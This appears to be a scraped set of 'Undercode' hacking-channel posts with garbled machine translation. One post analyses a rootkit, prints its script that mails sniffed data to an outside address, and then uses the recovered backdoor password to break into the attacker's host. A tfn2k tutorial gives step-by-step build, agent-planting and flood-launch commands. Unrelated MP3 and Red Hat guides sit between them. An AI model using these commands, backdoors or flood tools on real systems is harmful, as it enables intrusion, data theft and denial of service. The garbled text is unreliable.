▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Tracking a hack full tutorial by undercode :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) I check my machine, the unexpected discovery was hacked
actually my own mistakes, not patched wuftpd26, but also Without changing / etc / ftpusers,
people can easily use wuftpd26's remote vulnerability to enter my machine with anonymous users. However, this friend apparently used the rootkit without consideration

🦑 As a result, the output of ps is as follows:
[root @ ns] # ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 / sbin / mingetty tty1
679 2 S 0: 00 / sbin / mingetty tty2
680 3 S 0:00 / sbin / mingetty tty3
681 4 S 0:00 / sbin / mingetty tty4
682 5 S 0:00 / sbin / mingetty tty5
683 6 S 0:00 / sbin / mingetty tty6
5557? S 0:00 / bin / sh -i
5591? R 0:00 ps

🦑 I think anyone knows what it means. So let's take a step by step to see what he did
[this hack did not expect that this machine already has an owner, and installed its own rootkit toolkit]

1) [root @ ns] # strings / bin / login | more
..........
__bss_start
_end
PPRV
DISPLAY
/ bin / envpc
l4m3r0x
/ bin / sh

2) From the above, it can be seen that it is a login backdoor, through export PATH = \ After "l4m3r0x \", you can directly telnet each other to get #
[root @ ns] # strings / bin / ls | more
.....
always
/ usr / local / share / locale
fileutils
GNU fileutils-3.13
vdir
% s-% s
/dev/sgk/.fsdc/.1file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS

3) Note that /dev/sgk/.fsdc/.1file is where his rootkit file is located, so let's See what's there
[root @ ns] # mv /dev/sgk/.fsdc/.1file / tmp
[root @ ns] # ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undrecode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
XR-X. 1--rwxr undercode 28004 Real-Aug-PS 23 is
-rwxr XR-580 696-X. 1 undercode On Feb 2000 SSH 18 is
-rw-R & lt - r--. 1 the root FTP 1398 System On Feb. 4 08:55

4) Oh It seems that there are quite a lot of things. From ftp, we can know that he is using the ftP vulnerability. From lujiang, he also stole a local user
[root @ ns .fsdc] # cat .1logz
rshd
[root @ ns .fsdc] # cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root @ ns .fsdc] # cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

5) Logz is called by syslogd, which hides the records generated by the listed commands.
.1proc is called by the ps command. Hides the listed process names
. Listed file names,
[root @ ns .fsdc] # cd patches
[root @ ns patches] # cat patch.sh
#! / Bin / sh
echo \ "[1] Patching WU-FTPd ... \"
rpm -Uhv wuftpd.rpm
echo \ "[2] Patching NFS-utils ... \"
rpm -Fvh nfs-utils.rpm
ps aux >> / tmp / psaux
if [\ " cat / tmp / psaux | grep rpc. statd \ "]; then
echo \" [3] Restarting the rpc.statd daemon (NFS-utils) \ "
/etc/rc.d/init.d/nfslock restart
else
echo \ "[4] The daemon rpc.statd isn \ t running, so no need to restart! \"
fi
rm / tmp / psaux

6) This is a patch package for the wuftpd and rpc.statd vulnerabilities. ]
other file directory I did not carefully read [these will provide the download package]
according to the list of hidden files .1file us one find these documents.
[root @ ns .fsdc] # strings / usr / bin / xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/ bin / sh

7) It is not difficult to see that it is a backdoor
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log

🦑 This hack changed the syslogd file into a sniffer

. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.

[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================

🦑 From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.

> Boramae Cache Server 3.5.1

bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
944 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
957 1 S 0:00 -bash HOME = / root PATH = / sbin: / bin: / usr / sbin: / usr / bin SHELL = /
22151? S 0:00 -bash HOME = / root USER = root LOGNAME = root PATH = / usr / bin: / bin:
22178? S 0:00 \\ _ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN = | / usr / bin /
. . . . . . . . . .

3) Use the rpm command to see if often used commands are modified

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TRACKING A HACK FULL BY UNDERCODE

This methode is used by GOV

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.

My favorite is Grip written in GTK +.

1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.

2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.

🦑 The following is the URL of some CD ripper / MP3 encoder:


1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav

2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html

3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm

4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.

5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.

6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.

7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.

🦑 KDE Department: Krabber

1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.

2) It needs mpg123 to play MP3. Krabber's settings are similar to Grip. Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as / dev / hdc (CDROM drive). One feature of Krabber that Grip does not have is to adjust CPU resources so that you can record MP3s while working. Krabber is relatively easy to use, just follow its four steps:
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm

2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'

3) [user @ localhost user] $ su
Password: (enter root password)

4) [root @ localhost user] # rpm -Fvh up2date- *

5) [root @ localhost user] # up2date -pIf

you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and

enter your username and answer any questions you want to activate your account. The
other versions are the same

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

　Denial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.

> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.　　

🦑 First, the TCP syn flood
　　

1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.

2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.

3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The

> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.

🦑 　Of course, there are various methods of DOS attack, such as: UDP flood, ICMP / Ping, ICMP / SMURF ..., the specific principles can be introduced at http://www.chinaitlab.com/www/special/ciwddos.asp Take a look, there are very detailed principles and introduction of commonly used attack software. However, when it comes to DOS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous mixter in Germany (its home page http://mixter.void.ru/papers.html), it seems that it is currently buried What tfn3k, hey , I don't know how many people are sleeping

and eating ... two. Tfn2k attack principle

　　1) tfn2k attack system.

　　tfn2k should be regarded as a masterpiece of DDOS attacks, and its functions can be astounding and amazing ... (awe of it is like a river, it continues ...) Let's take a look at its architecture.

　　Master --- Run tfn client to remotely control and specify attack targets, change the attack method. (Sinister evil)

　　Agent --- is the victim of implanted and running td process, accept the command of tfn, the implementer of the attack. It should be noted that an attacker often controls multiple agents to complete the attack, and the system is mostly unix, linux, etc. (Poor victim) The

　　target host --- the host or network that was attacked by DDOS Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, depressed like me)

　2) tfn2k features.

　　◆ The master sends the command to the agent host through TCP, UDP, ICMP or random use of one of the packets (default. Random). The attack methods include TCP / SYN, UDP, ICMP / PING, mixed attacks, TARGA3, etc. .

　　◆ The communication between the master and the agent is unidirectional, that is, the master only sends commands to the agent, and it will use random header information, even virtual source address information. The agent will not send any information to the master in the reverse direction. .

　　after CAST-256 algorithm plus life, enter a keyword that is when it all compiler ◆ password command. and this password as the only authentication credentials.

　　◆ use td process, the master device can execute remote shell command.

　　◆ td process The name can be changed at compile time, which makes it easier to hide.

　　◆ tfn can compile and run on win32 and linux systems

　　...

　　As for the function of falsifying the source IP address, it is more basic, and compared with the old version of tfn, It is more efficient to

send out packages . In my own test, in less than 5 minutes, two agent machines paralyzed my redhat linux 9.0 system. Three . Tfn2k actual test

　　1 ) Test environment:

　　　Software: redhat linux 9.0
　　　Hardware platform:
　　　　 master:
　　　　　　　 IP: 192.168.0.6
　　　　　　　PIV2.4 / 256 * 2 / rtl8139
　　　　 Ag1:
　　　　　　　 IP: 192.168.0.2
　　　　　　　PIV2.4 / 256 * / rtl8139
　　　　 AG2: IP: 192.168.0.3
　　　　　　　pIV2.6 / 512 * 2 / 3c905
　　　　 AIM: 192.168.0.5
　　　　　　　pIV2.66c / 512 * 2 / 3c905
　　　　 switch: D_link des 1024R

　　1) Download tfn2k.tgz (Because this software is unusual, I do n’t provide the download address. If you are interested, Find it online)

　　2) Unzip: tar zxvf tfn2k.tgz

　　3) Modify the file

　　A. src / Makefile If your system is a linux system, you do n’t need to do any repairs. If it is a win32 system, please


　　　　　 # Linux / * BSD * / Others
　　　　　　CC = gcc
　　　　　　CFLAGS = -Wall -O3
　　　　　　CLIBS =

　　These lines are commented out, and


　　　　　 # Win32 (cygwin)
　　　　　 #CC = gcc
　　　　　 #CFLAGS = -Wall -DWINDOZE -O2
　　　　　 #CLIBS = Uncomment

　　these lines. Because my test system is redhat linux 9.0, no changes have been made.

　　B. src / config. h, which is available by default. If you are interested, you can adjust it according to its annotation information.

　　C. src / ip.h Make some changes here, otherwise there will be compilation errors and duplicate definitions.


　　　　　/ * struct in_addr
　　　　　　{
　　　　　　 unsigned long int s_addr;
　　　　　}; * /

　　Note ~ I put it between "/ * * /", which is commented out :) 　　　

　　D) Change the compiler:

　　because tfn2k supports It is egcs-1.1.2-30, and redhat linux9.0 contain

s gcc-3.2.2-5, so if you do not replace gcc, tfn2k cannot be compiled. It should be noted that after the change, It will cause the software based on gcc3.2.2 not to compile, please be cautious. The

　　method is very simple, find a redhat linux 6.2 installation disk, set egcs-1.1.2-30.rpm, cpp-1.1.2-30. Copy rpm to ~ /


　　　 cd / mnt / cdrom / Redhat / RPMS
　　　 cp egcs-1.1.2-30 * cpp-1.1.2-30 * ~ /

　　Install cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

　　Install egcs rpm -Uvh egcs-1.1.2-30.i386.rpm

　　(if prompted incorrectly, use nodeps, oldpackages, ignoreos Wait for the parameters to ignore the past)

　　4) Compile tfn2k


　　　 cd tfn2k / src
　　　 make

　　first will talk about a statement, you must accept it, and then you will be prompted to enter an 8-32 bit password, as mentioned earlier, this is the only authentication credential, will be Distributed in the td process, so be sure to remember it ~.

　　After compiling, td and tfn will be generated. This is the famous tfn2k ~, td is a daemon process used to install in the agent, and tfn is the control end.

　　5) Install td.

　　Upload td to my two Agents, ag1 (192.168.0.2) and ag2 (192.168.0.3), because I'm just testing, so I use a legitimate root to upload and execute the td process. If you really want to find and install an agent, you may have to pay God, because no administrator will say "come on baby . I will give you root, and install td as a proxy"


　　 [root @ test /] ftp 192.168.0.2
　　　　　 Connected to 192.168.0.2.
　　　　　 530 Please login with USER and PASS.
　　　　　 530 Please login with USER and PASS.
　　　　　 Name (192.168.0.2:root): wjpfjy
　　　　　 331 Please specify the password.
　　　　　 Password:
　　　　　 230 Login successful. Have fun.
　　　　　 Remote system type is UNIX.
　　　　　 Using binary mode to transfer files.
　　　　Ftp> put td (upload td)
　　　　　local: td remote : td
　　　　　227 Entering Passive Mode (192,168,0,3,198,225)
　　　　　553 Could not create file.
　　　　ftp> by (quit ftp)
　　　　 221 Goodbye.

　　 [root @ test /] ssh 192.168.0.2
// Log in to ag1 to execute td, note, I use the root account so that I have sufficient permissions to execute it.
　　　　　　 Root@192.168.0.2's password:
　　　　　　 Last login: Tue Feb 24 06:51:13 2004
　　 [root @ ag1 /] find / -name td- print
// Find the file td just uploaded.
　　 [root @ ag1 wjpfjy /] chmod a + x td
// Make it execute.
　　 [root @ ag1 wjpfjy /]./ td
// Run td, so you have a proxy, and it will only command you From: (.

　　

　　Use the same method to install and run the TFN2k process td on ag2 (192.168.0.3). 　　

　　6) The attack begins (the tragic memory is being staged ...)

　　Return to the master (192.168.0.6) and prepare for the exercise. ..


　　　[root @ master root] #touch host.txt
// Set up a proxy record file (because if you are bored enough, you may create a lot of broilers-
// proxy, do n’t write down and forget it.)
　　[root @master root] echo "192.168.0.2"> host.txt Add ag1 that has executed td to host.txt.
　　[root @ master root] echo "192.168.0.3" >> host.txt Add ag2 to host.txt.

　　First

　　Let's test the link. [Root @ master root] ./ tfn -f host.txt -c 10 -i "mkdir wjpfjy" Communicate with the agent in host.txt and let it execute the command mkdir wjpfjy to create a directory


　　 Protocol: random
　　　　Source IP: random
　　　　Client input:list
　　　　Command: execute remote command

　　　 Password verification:　　　　
// Here, you will be prompted to enter the password, which is the password entered during compilation. If you make a mistake, you will not be able to communicate with the td process.

　　　 Sending out packets: ..

　　Go to ag1 and ag2 to see if there is Create a directory name wjpfjy. Generally, it will exist in the same directory of td. If you are not sure, you can use find / -name wjpfjy -print to find 　　

　　[root @ master root] ./ tfn -f host.txt -c 6- i 192.168.0.5 started ICMP / PING attack aim ... (Poor my P4, less than 5 minutes, as slow as 386), but before the game over, it still had a hard time recording the attack data, also It can be regarded as the NK Ocean. This is the packet capture record of tcpdump.

[Root @ aim root] # tcpdump -r pack.atta -c 4 -xX
08: 03: 36.524907 23.43.171.0> 192.168.0.5 icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524933 192.168.0.5> 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08 : 03: 36.524944 36.235.130.0> 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08: 03: 36.524984 192.168.0.5> 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......

　

　　[root @ master root ] ./ tfn -f host.txt -c 0 Stop attack


　　　　Protocol: random
　　　　Source IP: random
　　　　Client input: list
　　　　Command: stop flooding

Password verification:

Sending out packets: ...

　　Of course, there are other attack methods. You can change the attack method by using -c X.


　 [root @ master root ] ./ tfn
　　 usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
　　　　　　　　Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host / ip] Specify your source IP. Randomly spoofed by default, you need
　　　　　　　　to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options / targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<- c command ID> 0-Halt all current floods on server (s) immediately
　　　　　　　　1-Change IP antispoof-level (evade rfc2267 filtering)
　　　　　　　　　　usage: -i 0 (fully spoofed) to -i 3 (/ 24 host bytes spoofed)
　　　　　　　　2- Change Packet size, usage: -i
　　　　　　　　3-Bind root shell to a port, usage: -i
　　　　　　　　4-UDP flood, usage: -i victim @ victim2 @ victim3 @ ...
　　　　　　　　5-TCP / SYN flood, usage: -i victim @ ... [-p destination port]
　　　　　　　　6-ICMP / PING flood, usage: -i victim @ ...
　　　　　　　　7-ICMP / SMURF flood, usage: -i victim @ broadcast @ broadcast2 @ ...
　　　　　　　　8-MIX flood (UDP / TCP / ICMP interchanged), usage: -i victim @ ...
　　　　　　　　9-TARGA3 flood (IP stack penetration ), Usage: -i victim @ ...
　　　　　　　　10 - blindly the Execute Remote shell the Command, the Command Usage -i

four defensive approach.

　　Like the internet, like all presentations DDOS article, DDOS hard to detect, I try to filter out all icmp packet firewall, To protect my mainframe, but what I realized was that my mainframe crashed later. Hey ~, do n’t expect me to guard against DDOS, if I can guard against it, I do n’t have to sleep: (

　　still the old saying, we can do What we do is to try our best not to make our host a proxy for others to attack, and to strictly restrict the intranet intranet travel, try not to harm others, as long as everyone does this, our network environment can be safer, at least, I You can sleep peacefully for a few days.

　　Attach a part of my firewall. It is mainly for ICMP / PING, but it is not very useful: (

/ sbin / iptables -P INPUT DROP
/ sbin / iptables -A INPUT -i lo -p all -j ACCEPT
/ sbin / iptabl es -A INPUT -i eth1 -p icmp -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp-type 8 -j DROP
/ sbin / iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/ sbin / iptables -A INPUT -s 127.0.0.2- i eth0 -j DROP
/ sbin / iptables -A INPUT -s $ LAN_NET / 24 -i eth0 -j DROP
/ sbin / iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/ sbin / iptables -A -j -i eth0 -s 10.0.0.0/8 the INPUT the DROP
/ sbin / iptables -A limit the INPUT -i eth0 -m --limit. 1 / sec
--limit-Burst. 5 -j ACCEPT / sbin / iptables -A the INPUT
- i eth0 -p udp -m state --state NEW -j REJECT
/ sbin / iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth0 -m state
--state ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p udp -i eth0 -m state
--state ESTABLISHED, RELATED -m udp --dport 1024: -j ACCEPT
/ sbin / iptables -A INPUT -p icmp --icmp- type echo-request
-j LOG --log-level 2
/ sbin / iptables -A INPUT -i eth0 -p icmp --icmp-type
echo-request -j DROP
/ sbin / iptables -A INPUT -p tcp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -p udp -m multiport
--destination-port 135,137,138,139 -j LOG
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/ sbin / iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/ sbin / iptables -A INPUT -p tcp -i eth1 -m state --state
ESTABLISHED, RELATED -m tcp --dport 1024: -j ACCEPT The

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 This full ddos tutorial, powered by deepweb

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 incredible hacking techniques BY UNDERCODE
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Losing the "hand" will leak the password

> The temperature of the keyboard after the finger has been pressed will leak the password!

> SIM card hijacking makes your phone unable to make calls or access the Internet, and passwords of Google and FB accounts have also been tampered with
`` One finger '' ATM collection is convenient and safe! Japanese expert:

> Digital camera can interpret the finger vein map in 10 minutes by taking a photo of the palm
AI can generate fake fingerprints

2) "Hearing" powerful hacker attack

> "Dolphin Attack" technology can send sounds that are not received by human ears to smart voice assistants

> "Mosquito" (mosquito) proof-of-concept attack that uses a speaker or headset to transfer data from a networked or isolated computer
Control your current noise to `` listen '' to your screen
Speaker or headset can transfer computer data

3) Everything is horrible

Webcam at checkout counter, sneak shot of credit card information
Credit card information leaked, webcam fools when paying!
So fragile! Shouting computer system crashed

4) Crash! This can also be horrible

Even if you are not connected to the Internet, you can use the power line to transmit the changes in current to steal computer data.
Retreat practice! Hundreds of prisoners used the electronic system "JPay" loophole to jointly steal US $ 225,000 (about 6.89 million Taiwan dollars)

